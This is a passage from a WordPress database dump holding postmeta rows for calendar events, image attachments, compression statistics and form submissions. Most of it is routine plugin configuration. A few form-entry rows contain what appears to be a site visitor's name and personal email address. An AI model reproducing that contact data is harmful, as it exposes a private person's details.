\"start\";a:4:{s:4:\"date\";s:10:\"2022-01-09\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-01-09\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(151477,266056,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(151478,266056,'mec_certain_weekdays','a:0:{}'),(151479,266056,'mec_allday','0'),(151480,266056,'one_occurrence','0'),(151481,266056,'mec_hide_time','0'),(151482,266056,'mec_hide_end_time','0'),(151483,266056,'mec_comment',''),(151484,266056,'mec_timezone','global'),(151485,266056,'mec_countdown_method','global'),(151486,266056,'mec_public','1'),(151487,266056,'mec_start_date','2022-01-09'),(151488,266056,'mec_start_time_hour','10'),(151489,266056,'mec_start_time_minutes','30'),(151490,266056,'mec_start_time_ampm','AM'),(151491,266056,'mec_start_day_seconds','37800'),(151492,266056,'mec_end_date','2022-01-09'),(151493,266056,'mec_end_time_hour','10'),(151494,266056,'mec_end_time_minutes','30'),(151495,266056,'mec_end_time_ampm','AM'),(151496,266056,'mec_end_day_seconds','37800'),(151497,266056,'mec_repeat_status','0'),(151498,266056,'mec_repeat_type',''),(151499,266056,'mec_repeat_interval','1'),(151500,266056,'mec_repeat_end',''),(151501,266056,'mec_repeat_end_at_occurrences',''),(151502,266056,'mec_repeat_end_at_date',''),(151503,266056,'mec_advanced_days','a:0:{}'),(151504,266056,'mec_in_days',''),(151505,266056,'mec_not_in_days',''),(151506,266056,'mec_hourly_schedules','a:0:{}'),(151507,266056,'mec_booking','a:0:{}'),(151508,266056,'mec_tickets','a:0:{}'),(151509,266056,'mec_fees_global_inheritance','1'),(151510,266056,'mec_fees','a:0:{}'),(151511,266056,'mec_ticket_variations_global_inheritance','1'),(151512,266056,'mec_ticket_variations','a:0:{}'),(151513,266056,'mec_reg_fields_global_inheritance','1'),(151514,266056,'mec_reg_fields','a:0:{}'),(151515,266056,'mec_bfixed_fields','a:0:{}'),(151516,266056,'mec_op','a:0:{}'),(151517,266056,'mec_fields','a:0:{}'),(151518,266056,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(151519,266056,'mec_event_status','EventScheduled'),(151520,266056,'mec_moved_online_link',''),(151521,266056,'mec_cancelled_reason',''),(151522,266056,'mec_display_cancellation_reason_in_single_page',''),(151523,266056,'protect_children',''),(151524,266056,'passster_activate_global_protection',NULL),(151525,266056,'passster_activate_protection',NULL),(151526,266056,'passster_protection_type','password'),(151527,266056,'boldgrid_hide_page_title','0'),(151541,266056,'_thumbnail_id','266117'),(151529,266056,'_dp_original','265681'),(151530,266056,'_edit_lock','1642014940:2'),(151531,266056,'_edit_last','2'),(161658,266676,'mec_hide_end_time','0'),(159669,266548,'_field_133','wilma'),(161660,266676,'mec_timezone','global'),(161659,266676,'mec_comment',''),(151549,266061,'mec_color',''),(151550,266061,'mec_location_id','122'),(151544,266060,'original-file','2021/12/boy-birds-life-2-updraft-pre-smush-original.jpg'),(151545,266060,'smush-complete','1'),(151546,266060,'smush-info','The file was compressed from 52.12 KB to 50.32 KB saving 3.46 percent using WP-Optimize'),(151547,266060,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:53372;s:12:\"smushed-size\";i:51527;s:15:\"savings-percent\";d:3.45999999999999996447286321199499070644378662109375;}'),(151548,266061,'protect_children',''),(151539,266060,'_wp_attached_file','2021/12/boy-birds-life-2.jpg'),(151540,266060,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:643;s:6:\"height\";i:343;s:4:\"file\";s:28:\"2021/12/boy-birds-life-2.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"boy-birds-life-2-300x160.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"boy-birds-life-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:28:\"boy-birds-life-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:28:\"boy-birds-life-2-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:28:\"boy-birds-life-2-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:28:\"boy-birds-life-2-300x343.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:343;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:28:\"boy-birds-life-2-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(151551,266061,'mec_dont_show_map','0'),(151552,266061,'mec_organizer_id','1'),(151553,266061,'mec_start_date','2021-12-05'),(151554,266061,'mec_start_time_hour','10'),(151555,266061,'mec_start_time_minutes','30'),(151556,266061,'mec_start_time_ampm','AM'),(151557,266061,'mec_start_day_seconds','37800'),(151558,266061,'mec_end_date','2021-12-05'),(151559,266061,'mec_end_time_hour','11'),(151560,266061,'mec_end_time_minutes','30'),(151561,266061,'mec_end_time_ampm','AM'),(151562,266061,'mec_end_day_seconds','41400'),(151563,266061,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-12-05\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-12-05\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(151564,266061,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(151565,266061,'mec_certain_weekdays','a:0:{}'),(151566,266061,'mec_allday','0'),(151567,266061,'mec_hide_time','0'),(151568,266061,'mec_hide_end_time','0'),(151569,266061,'mec_comment',''),(151570,266061,'mec_repeat_status','0'),(151571,266061,'mec_repeat_type',''),(151572,266061,'mec_repeat_interval','1'),(151573,266061,'mec_repeat_end',''),(151574,266061,'mec_repeat_end_at_occurrences',''),(151575,266061,'mec_repeat_end_at_date',''),(151576,266061,'mec_advanced_days','a:0:{}'),(151577,266061,'mec_in_days',''),(151578,266061,'mec_not_in_days',''),(151579,266061,'mec_hourly_schedules','a:0:{}'),(151580,266061,'mec_booking','a:0:{}'),(151581,266061,'mec_tickets','a:0:{}'),(151582,266061,'mec_fees_global_inheritance','1'),(151583,266061,'mec_fees','a:0:{}'),(151584,266061,'mec_ticket_variations_global_inheritance','1'),(151585,266061,'mec_ticket_variations','a:0:{}'),(151586,266061,'mec_reg_fields_global_inheritance','1'),(151587,266061,'mec_reg_fields','a:0:{}'),(151588,266061,'mec_op','a:0:{}'),(151589,266061,'mec_event_date_submit','20210422105713'),(151590,266061,'_thumbnail_id','266036'),(151591,266061,'mec_read_more',''),(151592,266061,'mec_more_info',''),(151593,266061,'mec_more_info_title',''),(151594,266061,'mec_more_info_target','_self'),(151595,266061,'mec_cost',''),(151596,266061,'mec_currency','a:0:{}'),(151597,266061,'mec_additional_organizer_ids','a:0:{}'),(151598,266061,'mec_additional_location_ids','a:0:{}'),(151599,266061,'one_occurrence','0'),(151600,266061,'mec_timezone','global'),(151601,266061,'mec_countdown_method','global'),(151602,266061,'mec_public','1'),(151603,266061,'mec_bfixed_fields','a:0:{}'),(151604,266061,'mec_fields','a:0:{}'),(151605,266061,'mec_event_status','EventScheduled'),(151606,266061,'mec_moved_online_link',''),(151607,266061,'mec_cancelled_reason',''),(151608,266061,'mec_display_cancellation_reason_in_single_page',''),(151609,266061,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(151610,266061,'passster_activate_global_protection',NULL),(151611,266061,'passster_activate_protection',NULL),(151612,266061,'passster_protection_type','password'),(151614,266061,'_dp_original','266035'),(151615,266061,'_edit_lock','1638726285:2'),(151616,266062,'passster_protection_type','password'),(151617,266062,'passster_activate_protection',NULL),(151618,266062,'passster_activate_global_protection',NULL),(151619,266062,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(151620,266062,'mec_display_cancellation_reason_in_single_page',''),(151621,266062,'mec_cancelled_reason',''),(151622,266062,'mec_moved_online_link',''),(151623,266062,'mec_event_status','EventScheduled'),(151624,266062,'mec_fields','a:0:{}'),(151625,266062,'mec_bfixed_fields','a:0:{}'),(151626,266062,'mec_public','1'),(151627,266062,'mec_countdown_method','global'),(151628,266062,'mec_timezone','global'),(151629,266062,'one_occurrence','0'),(151630,266062,'mec_additional_location_ids','a:0:{}'),(151631,266062,'mec_additional_organizer_ids','a:0:{}'),(151632,266062,'mec_currency','a:0:{}'),(151633,266062,'mec_cost',''),(151634,266062,'mec_more_info_target','_self'),(151635,266062,'mec_more_info_title',''),(151636,266062,'mec_more_info',''),(151637,266062,'mec_read_more',''),(151638,266062,'_thumbnail_id','263953'),(151639,266062,'mec_event_date_submit','20210422105713'),(151640,266062,'mec_op','a:0:{}'),(151641,266062,'mec_reg_fields','a:0:{}'),(151642,266062,'mec_reg_fields_global_inheritance','1'),(151643,266062,'mec_ticket_variations','a:0:{}'),(151644,266062,'mec_ticket_variations_global_inheritance','1'),(151645,266062,'mec_fees','a:0:{}'),(151646,266062,'mec_fees_global_inheritance','1'),(151647,266062,'mec_tickets','a:0:{}'),(151648,266062,'mec_booking','a:0:{}'),(151649,266062,'mec_hourly_schedules','a:0:{}'),(151650,266062,'mec_not_in_days',''),(151651,266062,'mec_in_days',''),(151652,266062,'mec_repeat_type',''),(151653,266062,'mec_repeat_interval','1'),(151654,266062,'mec_repeat_end',''),(151655,266062,'mec_repeat_end_at_occurrences',''),(151656,266062,'mec_repeat_end_at_date',''),(151657,266062,'mec_advanced_days','a:0:{}'),(151658,266062,'mec_allday','0'),(151659,266062,'mec_hide_time','0'),(151660,266062,'mec_hide_end_time','0'),(151661,266062,'mec_comment',''),(151662,266062,'mec_repeat_status','0'),(151663,266062,'mec_certain_weekdays','a:0:{}'),(151664,266062,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(151665,266062,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-01-02\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-01-02\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(151666,266062,'protect_children',''),(151667,266062,'mec_color',''),(151668,266062,'mec_location_id','118'),(151669,266062,'mec_dont_show_map','1'),(151670,266062,'mec_organizer_id','1'),(151671,266062,'mec_start_date','2022-01-02'),(151672,266062,'mec_start_time_hour','10'),(151673,266062,'mec_start_time_minutes','30'),(151674,266062,'mec_start_time_ampm','AM'),(151675,266062,'mec_start_day_seconds','37800'),(151676,266062,'mec_end_date','2022-01-02'),(151677,266062,'mec_end_time_hour','11'),(151678,266062,'mec_end_time_minutes','30'),(151679,266062,'mec_end_time_ampm','AM'),(151680,266062,'mec_end_day_seconds','41400'),(151681,266062,'_dp_original','265756'),(151682,266062,'_edit_lock','1640044735:2'),(151683,266062,'_edit_last','2'),(151684,266063,'_wp_attached_file','2021/12/sunset-lightshine.jpg'),(151685,266063,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:805;s:6:\"height\";i:445;s:4:\"file\";s:29:\"2021/12/sunset-lightshine.jpg\";s:8:\"filesize\";i:67899;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:29:\"sunset-lightshine-350x193.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16146;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:29:\"sunset-lightshine-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5682;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:29:\"sunset-lightshine-768x425.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:425;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:53970;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:29:\"sunset-lightshine-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16380;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:29:\"sunset-lightshine-500x445.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:445;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:36423;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:29:\"sunset-lightshine-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27829;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:29:\"sunset-lightshine-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20313;}s:8:\"tileview\";a:5:{s:4:\"file\";s:29:\"sunset-lightshine-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18362;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(151686,266063,'original-file','2021/12/sunset-lightshine-updraft-pre-smush-original.jpg'),(151687,266063,'smush-complete','1'),(151688,266063,'smush-info','The file was compressed from 47.55 KB to 46.24 KB saving 2.77 percent using WP-Optimize'),(151689,266063,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:48695;s:12:\"smushed-size\";i:47345;s:15:\"savings-percent\";d:2.770000000000000017763568394002504646778106689453125;}'),(155476,266324,'_seq_num','22'),(155475,266324,'_form_id','44'),(155474,266324,'_field_404','jeppre22@gmail.com'),(155473,266324,'_field_403','Milburn'),(151695,266067,'_wp_attached_file','2021/12/hu-sos-bgrid-sized-2.png'),(151696,266067,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:235;s:6:\"height\";i:147;s:4:\"file\";s:32:\"2021/12/hu-sos-bgrid-sized-2.png\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"hu-sos-bgrid-sized-2-150x147.png\";s:5:\"width\";i:150;s:6:\"height\";i:147;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(151697,266067,'original-file','2021/12/hu-sos-bgrid-sized-2-updraft-pre-smush-original.png'),(151698,266067,'smush-complete','1'),(151699,266067,'smush-info','The file was compressed from 65.84 KB to 20.01 KB saving 69.6 percent using WP-Optimize'),(151700,266067,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:67423;s:12:\"smushed-size\";i:20495;s:15:\"savings-percent\";d:69.599999999999994315658113919198513031005859375;}'),(151856,266081,'passster_activate_global_protection',NULL),(151857,266081,'passster_activate_protection',NULL),(151858,266081,'passster_protection_type','password'),(151860,266081,'_dp_original','265927'),(151861,266081,'_edit_lock','1639676405:2'),(151862,266081,'_edit_last','2'),(151863,266081,'_thumbnail_id','266083'),(151864,266083,'_wp_attached_file','2021/12/machu-pichu-2.jpg'),(151865,266083,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:608;s:6:\"height\";i:342;s:4:\"file\";s:25:\"2021/12/machu-pichu-2.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"machu-pichu-2-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"machu-pichu-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:25:\"machu-pichu-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:25:\"machu-pichu-2-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:25:\"machu-pichu-2-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:25:\"machu-pichu-2-300x342.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:342;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"machu-pichu-2-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(151866,266083,'original-file','2021/12/machu-pichu-2-updraft-pre-smush-original.jpg'),(151867,266083,'smush-complete','1'),(151868,266083,'smush-info','The file was compressed from 84.95 KB to 79.60 KB saving 6.3 percent using WP-Optimize'),(151869,266083,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:86989;s:12:\"smushed-size\";i:81513;s:15:\"savings-percent\";d:6.29999999999999982236431605997495353221893310546875;}'),(152050,266103,'mec_start_time_ampm','PM'),(152051,266103,'mec_start_day_seconds','46800'),(152052,266103,'mec_end_date','2022-02-19'),(152053,266103,'mec_end_time_hour','2'),(152054,266103,'mec_end_time_minutes','0'),(152055,266103,'mec_end_time_ampm','PM'),(152056,266103,'mec_end_day_seconds','50400'),(152057,266103,'mec_repeat_status','0'),(152058,266103,'mec_repeat_type',''),(152059,266103,'mec_repeat_interval','1'),(152060,266103,'mec_repeat_end',''),(152061,266103,'mec_repeat_end_at_occurrences',''),(152062,266103,'mec_repeat_end_at_date',''),(152063,266103,'mec_advanced_days','a:0:{}'),(152064,266103,'mec_in_days',''),(152065,266103,'mec_not_in_days',''),(152066,266103,'mec_hourly_schedules','a:0:{}'),(152067,266103,'mec_booking','a:0:{}'),(152068,266103,'mec_tickets','a:0:{}'),(152069,266103,'mec_fees_global_inheritance','1'),(152070,266103,'mec_fees','a:0:{}'),(152071,266103,'mec_ticket_variations_global_inheritance','1'),(152072,266103,'mec_ticket_variations','a:0:{}'),(152073,266103,'mec_reg_fields_global_inheritance','1'),(152074,266103,'mec_reg_fields','a:0:{}'),(152075,266103,'mec_bfixed_fields','a:0:{}'),(152076,266103,'mec_op','a:0:{}'),(152077,266103,'mec_fields','a:0:{}'),(152078,266103,'mec_event_status','EventScheduled'),(152079,266103,'mec_moved_online_link',''),(152080,266103,'mec_cancelled_reason',''),(152081,266103,'mec_display_cancellation_reason_in_single_page',''),(152082,266103,'boldgrid_hide_page_title','0'),(152083,266103,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(152084,266103,'passster_activate_global_protection',NULL),(152085,266103,'passster_activate_protection',NULL),(152086,266103,'passster_protection_type','password'),(152087,266103,'_dp_original','265240'),(152088,266103,'_edit_lock','1640543794:2'),(189978,268899,'smush-complete','1'),(189979,268899,'smush-info','The file was compressed from 90.68 KB to 70.47 KB, saving 22.28 percent, using 